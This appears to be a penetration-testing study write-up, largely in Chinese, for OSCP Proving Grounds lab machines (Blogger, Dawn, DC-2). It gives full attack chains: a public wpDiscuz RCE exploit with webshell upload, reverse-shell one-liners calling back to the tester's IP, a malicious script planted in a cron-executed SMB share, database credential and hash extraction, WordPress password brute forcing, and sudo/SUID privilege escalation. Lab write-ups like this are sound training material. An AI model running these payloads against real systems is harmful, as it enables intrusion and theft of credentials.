--- title: '[OSCP, PEN-200] Proving Grounds Play - Linux' disqus: hackmd --- [OSCP, PEN-200] Proving Grounds Play - Linux === # Table of Contents [TOC] # Blogger ![image](https://hackmd.io/_uploads/Hyd8as82kg.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 192.168.117.217 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 04:22 EDT Nmap scan report for 192.168.117.217 Host is up (0.12s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA) | 256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA) |_ 256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Blogger | Home Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.54 seconds ``` 確認 SSH 允許的驗證方式 ``` ┌──(chw㉿CHW)-[~] └─$ nmap --script ssh-auth-methods -p22 192.168.117.217 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-18 04:23 EDT PORT STATE SERVICE 22/tcp open ssh | ssh-auth-methods: | Supported authentication methods: |_ publickey Nmap done: 1 IP address (1 host up) scanned in 1.08 seconds ``` > 只允許 publickey,無法使用密碼破解 #### 1.2 dirsearch ``` ┌──(chw㉿CHW)-[~] └─$ dirsearch -u http://192.168.117.217 ... [04:50:33] 301 - 319B - /assets -> http://192.168.117.217/assets/ [04:50:33] 200 - 475B - /assets/ [04:50:45] 301 - 316B - /css -> http://192.168.117.217/css/ [04:50:57] 301 - 319B - /images -> http://192.168.117.217/images/ [04:50:57] 200 - 693B - /images/ [04:51:01] 200 - 603B - /js/ ``` #### 1.3 瀏覽 /assets/ ![image](https://hackmd.io/_uploads/SywTHh8nJg.png) 內文嵌入很多 http://blogger.pg/... 的路徑\ ![image](https://hackmd.io/_uploads/BJO9I3U2kg.png) > 但無法瀏覽 #### 1.4 /ect/host ``` ┌──(chw㉿CHW)-[~] └─$ cat /etc/hosts 192.168.117.217 blogger.pg ``` 再次瀏覽 http://blogger.pg/assets/fonts/blog/wp-includes/\ ![image](https://hackmd.io/_uploads/SJTovh82kl.png) > Wordpress 找到 wordpress login 介面\ http://blogger.pg/assets/fonts/blog/wp-login.php\ ![image](https://hackmd.io/_uploads/rJaxF2U3ke.png) #### 1.5 Wpscan ``` ┌──(chw㉿CHW)-[~] └─$ wpscan --url http://blogger.pg/assets/fonts/blog/ --enumerate p --plugins-detection aggressive ... [+] akismet | Location: http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/ | Last Updated: 2025-02-14T18:49:00.000Z | Readme: http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/readme.txt | [!] The version is out of date, the latest version is 5.3.7 | | Found By: Known Locations (Aggressive Detection) | - http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/, status: 200 | | Version: 4.0.8 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://blogger.pg/assets/fonts/blog/wp-content/plugins/akismet/readme.txt [+] wpdiscuz | Location: http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/ | Last Updated: 2025-02-20T16:52:00.000Z | Readme: http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt | [!] The version is out of date, the latest version is 7.6.28 | | Found By: Known Locations (Aggressive Detection) | - http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/, status: 200 | | Version: 7.0.4 (80% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://blogger.pg/assets/fonts/blog/wp-content/plugins/wpdiscuz/readme.txt ``` > 找到兩個過期 plugin: `akismet` 與 `wpdiscuz` ### 2. searchsploit #### 2.1 akismet ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit akismet -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- WordPress Plugin Akismet - Multiple Cross-Site Scripting Vulnerabilities | php/webapps/37902.php WordPress Plugin Akismet 2.1.3 - Cross-Site Scripting | php/webapps/30036.html -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` > 版本不符 #### 2.2 wpdiscuz ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit wpdiscuz -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated) | php/webapps/49962.sh WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated) | php/webapps/49967.py Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary File Upload (Metasploit) | php/webapps/49401.rb -------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` > 三個 exploit 版本都符合 ### 3. Exploit #### 3.1 嘗試 `49967.py`: CVE-2020-24186 ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit -x 49967 ┌──(chw㉿CHW)-[~] └─$ searchsploit -m 49967 ``` 需要上傳路徑: `http://blogger.pg/assets/fonts/blog/?p=29`\ 透過留言區 ``` ┌──(chw㉿CHW)-[~] └─$ python3 49967.py -u http://blogger.pg/assets/fonts/blog/ -p ./?p=29 --------------------------------------------------------------- [-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution [-] File Upload Bypass Vulnerability - PHP Webshell Upload [-] CVE: CVE-2020-24186 [-] https://github.com/hevox --------------------------------------------------------------- [+] Response length:[59354] | code:[200] [!] Got wmuSecurity value: 444df237a3 [!] Got wmuSecurity value: 29 [+] Generating random name for Webshell... [!] Generated webshell name: oywknkrctpnlpmt [!] Trying to Upload Webshell.. [+] Upload Success... Webshell path:url&quot;:&quot;http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/03/oywknkrctpnlpmt-1742290432.2863.php&quot; > id [x] Failed to execute PHP code... ``` > 執行失敗,但他給了 Webshell 路徑\ > 嘗試瀏覽 http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/03/abbfeiyqkffmvqv-1742290331.3557.php?cmd=ls\ ![image](https://hackmd.io/_uploads/rk8U03Ihyx.png) > 可行\ > 嘗試塞入 Reverse Shell #### 3.2 Reverse Shell 先測試 Server 能否連線到 Kali\ `cmd=curl -v http://192.168.45.214` ``` ┌──(chw㉿CHW)-[~] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 192.168.117.217 - - [18/Mar/2025 05:41:37] "GET / HTTP/1.1" 200 - ``` 嘗試以下 ``` /bin/bash -i >& /dev/tcp/192.168.45.214/8888 0>&1 nc -e /bin/sh 192.168.45.214 8888 ``` >都不可行,猜測是 Webshell 執行完後立即終止 嘗試 python import socket ``` ?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' #若環境沒有 python3 ,可嘗試 python2: python2 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.214",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])' ``` > 成功 ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.214] from (UNKNOWN) [192.168.117.217] 55592 /bin/sh: 0: can't access tty; job control turned off $ $ whoami www-data $ cd / $ ls ... $ ls /home james ubuntu vagrant $ id uid=33(www-data) gid=33(www-data) groups=33(www-data) $ cat /etc/shadow cat: /etc/shadow: Permission denied $ grep "CRON" /var/log/syslog grep: /var/log/syslog: Permission denied ``` > `www-data` 權限很小 ### ✅ Get User Flag > 在 `/home/james`找到 User flag ## Privileges Escalation ### 4. LinPEAS ``` ┌──(chw㉿CHW)-[/] └─$ which linpeas /usr/bin/linpeas ┌──(chw㉿CHW)-[/] └─$ cp /usr/bin/linpeas /home/chw/Desktop/upload_file ┌──(chw㉿CHW)-[/] └─$ cd /home/chw/Desktop/upload_file ┌──(chw㉿CHW)-[~/Desktop/upload_file/linpeas] └─$ python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ``` $ bash -i www-data@ubuntu-xenial:/$ cd /tmp cd /tmp www-data@ubuntu-xenial:/tmp$ wget http://192.168.45.214/linpeas.sh www-data@ubuntu-xenial:/tmp$ chmod +x linpeas.sh www-data@ubuntu-xenial:/tmp$ ./linpeas.sh ... ╔══════════╣ Analyzing Wordpress Files (limit 70) -rw-r--r-- 1 www-data root 2878 Jan 17 2021 /var/www/wordpress/assets/fonts/blog/wp-config.php define('DB_NAME', 'wordpress'); define('DB_USER', 'root'); define('DB_PASSWORD', 'sup3r_s3cr3t'); define('DB_HOST', 'localhost'); ``` ### 5. Mysql ``` www-data@ubuntu-xenial:/$ mysql -u root -p'sup3r_s3cr3t' mysql -u root -p'sup3r_s3cr3t' show databases ; exit Database information_schema mysql performance_schema wordpress www-data@ubuntu-xenial:/$ mysql -u root -p'sup3r_s3cr3t' mysql -u root -p'sup3r_s3cr3t' use wordpress; show tables; exit Tables_in_wordpress wp_commentmeta wp_comments wp_links wp_options wp_postmeta wp_posts wp_term_relationships wp_term_taxonomy wp_termmeta wp_terms wp_usermeta wp_users wp_wc_avatars_cache wp_wc_comments_subscription wp_wc_feedback_forms wp_wc_follow_users wp_wc_phrases wp_wc_users_rated wp_wc_users_voted www-data@ubuntu-xenial:/$ mysql -u root -p'sup3r_s3cr3t' mysql -u root -p'sup3r_s3cr3t' use wordpress; select * from wp_users; exit ID user_login user_pass user_nicename user_email user_url user_registered user_activation_key user_status display_name 1 j@m3s $P$BqG2S/yf1TNEu03lHunJLawBEzKQZv/ jm3s admin@blogger.thm 2021-01-17 12:40:06 0 j@m3s www-data@ubuntu-xenial:/$ ``` > 不知道為什要 exit; 才會顯示\ > 總之拿到 Hash ### 5. Hashcat ``` ┌──(chw㉿CHW)-[~] └─$ hashid '$P$BqG2S/yf1TNEu03lHunJLawBEzKQZv' -m Analyzing '$P$BqG2S/yf1TNEu03lHunJLawBEzKQZv' [+] Juniper Netscreen/SSG(ScreenOS) [Hashcat Mode: 22] ┌──(chw㉿CHW)-[~] └─$ hashcat -m 22 oscp.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force ``` > 沒有結果 ### 6. 預設密碼 結果 vagrant 使用預設密碼 ``` www-data@ubuntu-xenial:/$ su vargrant su vargrant su: must be run from a terminal www-data@ubuntu-xenial:/home/vagrant$ script -qc "/bin/su vagrant" /dev/null script -qc "/bin/su vagrant" /dev/null Password: vagrant vagrant@ubuntu-xenial:~$ ``` ### 7. sudo -l ``` vagrant@ubuntu-xenial:~$ sudo -l sudo -l Matching Defaults entries for vagrant on ubuntu-xenial: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User vagrant may run the following commands on ubuntu-xenial: (ALL) NOPASSWD: ALL vagrant@ubuntu-xenial:~$ sudo -i sudo -i root@ubuntu-xenial:~# whoami whoami root root@ubuntu-xenial:~# ls /root ls /root proof.txt root@ubuntu-xenial:~# cat /root/proof.txt cat /root/proof.txt ``` ### ✅ Get Root FLAG # Dawn ![image](https://hackmd.io/_uploads/r1DwXyO2kg.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 192.168.117.11 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 02:27 EDT Nmap scan report for 192.168.117.11 Host is up (0.11s latency). Not shown: 996 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Site doesn't have a title (text/html). |_http-server-header: Apache/2.4.38 (Debian) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP) 3306/tcp open mysql MariaDB 5.5.5-10.3.15 | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.15-MariaDB-1 | Thread ID: 15 | Capabilities flags: 63486 | Some Capabilities: FoundRows, InteractiveClient, Speaks41ProtocolOld, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsTransactions, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolNew, SupportsCompression, SupportsLoadDataLocal, ODBCClient, ConnectWithDatabase, LongColumnFlag, Support41Auth, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments | Status: Autocommit | Salt: %RNph;.qre(2d$"|l*+9 |_ Auth Plugin Name: mysql_native_password Service Info: Host: DAWN Host script results: | smb-os-discovery: | OS: Windows 6.1 (Samba 4.9.5-Debian) | Computer name: dawn | NetBIOS computer name: DAWN\x00 | Domain name: dawn | FQDN: dawn.dawn |_ System time: 2025-03-19T02:27:43-04:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2025-03-19T06:27:42 |_ start_date: N/A |_clock-skew: mean: 1h20m02s, deviation: 2h18m34s, median: 1s | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 28.30 seconds ``` > Http, Mysql & Samba #### 1.2 dirsearch ``` ┌──(chw㉿CHW)-[~] └─$ dirsearch -u http://192.168.117.11/ ... [02:32:30] 301 - 315B - /logs -> http://192.168.117.11/logs/ [02:32:30] 200 - 505B - /logs/ ``` 嘗試瀏覽 http://192.168.117.11/logs/\ ![image](https://hackmd.io/_uploads/HyGYrku2ke.png) >auth.log (403)\ daemon.log (403)\ error.log (403)\ management.log (200) 瀏覽 `management.log` ![image](https://hackmd.io/_uploads/HkmxZb_nye.png) #### 1.3 Enum4linux ``` ┌──(chw㉿CHW)-[~] └─$ enum4linux -a 192.168.117.11 Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed Mar 19 03:51:05 2025 =========================================( Target Information )========================================= Target ........... 192.168.117.11 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... '' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none ... ===============================( Getting domain SID for 192.168.117.11 )=============================== Domain Name: WORKGROUP Domain Sid: (NULL SID) [+] Can't determine if host is part of domain or part of a workgroup ==================================( OS information on 192.168.117.11 )================================== [E] Can't get OS info with smbclient [+] Got OS info for 192.168.117.11 from srvinfo: DAWN Wk Sv PrQ Unx NT SNT Samba 4.9.5-Debian platform_id : 500 os version : 6.1 server type : 0x809a03 ======================================( Users on 192.168.117.11 )====================================== Use of uninitialized value $users in print at ./enum4linux.pl line 972. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 975. Use of uninitialized value $users in print at ./enum4linux.pl line 986. Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 988. ================================( Share Enumeration on 192.168.117.11 )================================ Sharename Type Comment --------- ---- ------- print$ Disk Printer Drivers ITDEPT Disk PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY. IPC$ IPC IPC Service (Samba 4.9.5-Debian) Reconnecting with SMB1 for workgroup listing. Server Comment --------- ------- Workgroup Master --------- ------- WORKGROUP WIN2K3STDVIC [+] Attempting to map shares on 192.168.117.11 ... [+] Password Info for Domain: DAWN [+] Minimum password length: 5 [+] Password history length: None [+] Maximum password age: 37 days 6 hours 21 minutes [+] Password Complexity Flags: 000000 [+] Domain Refuse Password Change: 0 [+] Domain Password Store Cleartext: 0 [+] Domain Password Lockout Admins: 0 [+] Domain Password No Clear Change: 0 [+] Domain Password No Anon Change: 0 [+] Domain Password Complex: 0 [+] Minimum password age: None [+] Reset Account Lockout Counter: 30 minutes [+] Locked Account Duration: 30 minutes [+] Account Lockout Threshold: None [+] Forced Log off Time: 37 days 6 hours 21 minutes [+] Retieved partial password policy with rpcclient: Password Complexity: Disabled Minimum Password Length: 5 ======================================( Groups on 192.168.117.11 )====================================== [+] Getting builtin groups: [+] Getting builtin group memberships: [+] Getting local groups: [+] Getting local group memberships: [+] Getting domain groups: [+] Getting domain group memberships: =================( Users on 192.168.117.11 via RID cycling (RIDS: 500-550,1000-1050) )================= [I] Found new SID: S-1-22-1 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [I] Found new SID: S-1-5-32 [+] Enumerating users using SID S-1-5-32 and logon username '', password '' S-1-5-32-544 BUILTIN\Administrators (Local Group) S-1-5-32-545 BUILTIN\Users (Local Group) S-1-5-32-546 BUILTIN\Guests (Local Group) S-1-5-32-547 BUILTIN\Power Users (Local Group) S-1-5-32-548 BUILTIN\Account Operators (Local Group) S-1-5-32-549 BUILTIN\Server Operators (Local Group) S-1-5-32-550 BUILTIN\Print Operators (Local Group) [+] Enumerating users using SID S-1-5-21-4292367078-475864837-953252120 and logon username '', password '' S-1-5-21-4292367078-475864837-953252120-501 DAWN\nobody (Local User) ``` > `//192.168.117.11/ITDEPT Mapping: OK Listing: OK Writing: N/A`\ > `ITDEPT`: 共享目錄可讀 (Mapping: OK, Listing: OK, Writing: N/A),但不能寫入 ### 2. Smbclient 使用 smbclient 來看該共享目錄: ``` ┌──(chw㉿CHW)-[~] └─$ smbclient -N //192.168.117.11/ITDEPT Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Aug 2 23:23:20 2019 .. D 0 Wed Jul 22 13:19:41 2020 7158264 blocks of size 1024. 3518852 blocks available smb: \> ``` > 空的?! 也可能是權限不足 🥚 從 `management.log` 可以得知 cron 不斷重複執行 `/home/dawn/ITDEPT/product-control` 和 `/home/dawn/ITDEPT/web-control` ### 3. Reverse Shell 塞入一個名為 `product-control` 或 `web-control` 的 reverse shell >[!Warning] >嘗試了 Tcp 與 Udp 都失敗:\ >`bash -c 'bash -i >& /dev/tcp/192.168.45.214/8888 0>&1'`\ >`bash -i > /dev/udp/192.168.45.214/8888 0>&1` ``` ┌──(chw㉿CHW)-[~] └─$ echo "python -c 'import socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.45.214",8888)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); p=subprocess.call(["/bin/sh","-i"]);'" >> web-control ``` 開啟 netcat 監聽: ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 8888 listening on [any] 8888 ... ``` ### 4. 上傳 reverse shell script ``` smb: \> put web-control putting file web-control as \web-control (0.1 kb/s) (average 0.1 kb/s) smb: \> ls . D 0 Wed Mar 19 04:40:29 2025 .. D 0 Wed Jul 22 13:19:41 2020 web-control A 50 Wed Mar 19 04:40:29 2025 7158264 blocks of size 1024. 3518828 blocks available smb: \> !bash web-control ``` > 等待 cron 執行\ > [選] `!bash web-control`: 也可直接執行 web-control (Kali) ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 8888 listening on [any] 8888 ... connect to [192.168.45.214] from (UNKNOWN) [192.168.117.11] 34666 /bin/sh: 0: can't access tty; job control turned off $ $ hostname dawn $ whoami www-data $ ``` ### ✅ Get User Flag > 在 `/home/dawn`找到 User flag ## Privileges Escalation ### 5. Sudo -l ``` www-data@dawn:/home/dawn$ sudo -l sudo -l Matching Defaults entries for www-data on dawn: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User www-data may run the following commands on dawn: (root) NOPASSWD: /usr/bin/sudo www-data@dawn:/home/dawn$ sudo su sudo su We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. sudo: no tty present and no askpass program specified ``` > sudo 不用密碼,但需要 Tty ### 6. 重建 Reverse shell 嘗試在 Reverse shell 中直接建立 Tty\ 另建 `product-control` 可以同時兩個 Reverse shell ``` ┌──(chw㉿CHW)-[~] └─$ cat product-control python3 -c 'import socket,subprocess,os,pty; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("192.168.45.214",6666)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/bash")' ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 6666 listening on [any] 6666 ... ``` (Smbclient) ``` smb: \> put product-control putting file product-control as \product-control (0.7 kb/s) (average 0.7 kb/s) smb: \> ls -l product-control NT_STATUS_NO_SUCH_FILE listing \-l ``` ### 7. 重試 Sudo -l ``` ┌──(chw㉿CHW)-[~] └─$ nc -nvlp 6666 listening on [any] 6666 ... connect to [192.168.45.214] from (UNKNOWN) [192.168.117.11] 54742 dawn@dawn:~$ id id uid=1000(dawn) gid=1000(dawn) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner) dawn@dawn:~$ whoami whoami dawn dawn@dawn:~$ cd /root cd /root bash: cd: /root: Permission denied dawn@dawn:~$ sudo -l sudo -l Matching Defaults entries for dawn on dawn: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User dawn may run the following commands on dawn: (root) NOPASSWD: /usr/bin/mysql dawn@dawn:~$ ``` > (root) NOPASSWD: /usr/bin/mysql #### 8. GTFO: mysql 查詢 [GTFO](https://gtfobins.github.io/gtfobins/mysql/) ``` dawn@dawn:~$ sudo mysql -e '\! /bin/sh' sudo mysql -e '\! /bin/sh' ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using password: NO) ``` > MySQL root 使用者需要密碼\ > (失敗) #### 9. SUID ``` dawn@dawn:~$ find / -perm -u=s -type f 2>/dev/null find / -perm -u=s -type f 2>/dev/null /usr/sbin/mount.cifs /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/bin/su /usr/bin/newgrp /usr/bin/pkexec /usr/bin/passwd /usr/bin/sudo /usr/bin/mount /usr/bin/zsh /usr/bin/gpasswd /usr/bin/chsh /usr/bin/fusermount /usr/bin/umount /usr/bin/chfn ``` #### 10. zsh ``` dawn@dawn:~$ /usr/bin/zsh /usr/bin/zsh dawn# whoami whoami root dawn# cd /root cd /root dawn# ls ls flag.txt proof.txt dawn# cat flag.txt cat flag.txt Your flag is in another file... dawn# cat proof.txt ``` ### ✅ Get Root FLAG # DC-2 ![image](https://hackmd.io/_uploads/BJtR7GOnkg.png) ## Solution ### 1. Recon #### 1.1 Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -T4 192.168.117.194 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 05:53 EDT Nmap scan report for 192.168.117.194 Host is up (0.13s latency). Not shown: 999 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.10 ((Debian)) |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Did not follow redirect to http://dc-2/ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 32.30 seconds ``` > 只有一個 80 port ?! #### 1.2 /etc/hosts ``` ┌──(chw㉿CHW)-[~] └─$ cat /etc/hosts 192.168.117.194 dc-2 ``` #### 1.3 瀏覽 http 瀏覽 http://192.168.117.194\ ![image](https://github.com/user-attachments/assets/a7d276f5-6f48-45db-8eb7-eb55cf007c83) 點選 "Flag": http://dc-2/index.php/flag/\ ![image](https://hackmd.io/_uploads/B1bDx7O31l.png) > 提示使用 `cewl` ?! #### 1.4 WPScan ![image](https://hackmd.io/_uploads/SyCeZmu2Je.png) ``` ┌──(chw㉿CHW)-[~] └─$ wpscan --url http://dc-2/ --enumerate p --plugins-detection aggressive ... [+] WordPress theme in use: twentyseventeen | Location: http://dc-2/wp-content/themes/twentyseventeen/ | Last Updated: 2024-11-12T00:00:00.000Z | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt | [!] The version is out of date, the latest version is 3.8 | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10 | Style Name: Twenty Seventeen | Style URI: https://wordpress.org/themes/twentyseventeen/ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo... | Author: the WordPress team | Author URI: https://wordpress.org/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.2 (80% confidence) | Found By: Style (Passive Detection) | - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2' ... [+] akismet | Location: http://dc-2/wp-content/plugins/akismet/ | Last Updated: 2025-02-14T18:49:00.000Z | Readme: http://dc-2/wp-content/plugins/akismet/readme.txt | [!] The version is out of date, the latest version is 5.3.7 | | Found By: Known Locations (Aggressive Detection) | - http://dc-2/wp-content/plugins/akismet/, status: 200 | | Version: 3.3.2 (100% confidence) | Found By: Readme - Stable Tag (Aggressive Detection) | - http://dc-2/wp-content/plugins/akismet/readme.txt | Confirmed By: Readme - ChangeLog Section (Aggressive Detection) | - http://dc-2/wp-content/plugins/akismet/readme.txt ``` > `twentyseventeen` 與 `akismet` out of date ### 2. searchsploit ``` ┌──(chw㉿CHW)-[~] └─$ searchsploit twentyseventeen Exploits: No Results Shellcodes: No Results ┌──(chw㉿CHW)-[~] └─$ searchsploit aggressive --------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- IKE - Aggressive Mode Shared Secret Hash Leakage | hardware/remote/22532.txt --------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` > 沒有可以利用的資訊 ### 3. WPScan User ``` ┌──(chw㉿CHW)-[~] └─$ wpscan --url http://dc-2/ --enumerate u ... [i] User(s) Identified: [+] admin | Found By: Rss Generator (Passive Detection) | Confirmed By: | Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] jerry | Found By: Wp Json Api (Aggressive Detection) | - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: | Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Login Error Messages (Aggressive Detection) [+] tom | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection) | Confirmed By: Login Error Messages (Aggressive Detection) ``` 列出 username ``` ┌──(chw㉿CHW)-[~] └─$ cat username.txt admin jerry tom ``` ### 4. crewl cewl 根據網站產生字典檔 ``` ┌──(chw㉿CHW)-[~] └─$ cewl -w custom_wordlist.txt http://dc-2/ ┌──(chw㉿CHW)-[~] └─$ cat custom_wordlist.txt sit amet nec quis vel orci site ... ``` ### 5. wpscan 暴力破解 ``` ┌──(chw㉿CHW)-[~] └─$ wpscan --url http://dc-2/ -U username.txt -P custom_wordlist.txt --force ... [!] Valid Combinations Found: | Username: jerry, Password: adipiscing | Username: tom, Password: parturient ``` > `jerry`:`adipiscing`\ > `tom`:`parturient` ### 6. 登入 Wordpress 在 Jerry 管理頁面中找到 /Flag2 Page ![image](https://hackmd.io/_uploads/BJnYAQ_3kl.png) > 找到 Flag 2 的提示,但還是沒有利用點\ > 決定 nmap 掃描全部 port ### - Nmap ``` ┌──(chw㉿CHW)-[~] └─$ nmap -p- 192.168.117.194 Nmap scan report for 192.168.117.194 Host is up (0.098s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE 80/tcp open http 7744/tcp open raqmon-pdu ┌──(chw㉿CHW)-[~] └─$ nmap -sC -sV -p 7744 192.168.117.194 Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 23:42 EDT Nmap scan report for 192.168.117.194 Host is up (0.100s latency). PORT STATE SERVICE VERSION 7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0) | ssh-hostkey: | 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA) | 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA) | 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA) |_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### 7. SSH 使用 tom 成功登入 ``` ┌──(chw㉿CHW)-[~] └─$ ssh tom@192.168.117.194 -p 7744 tom@192.168.117.194's password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in 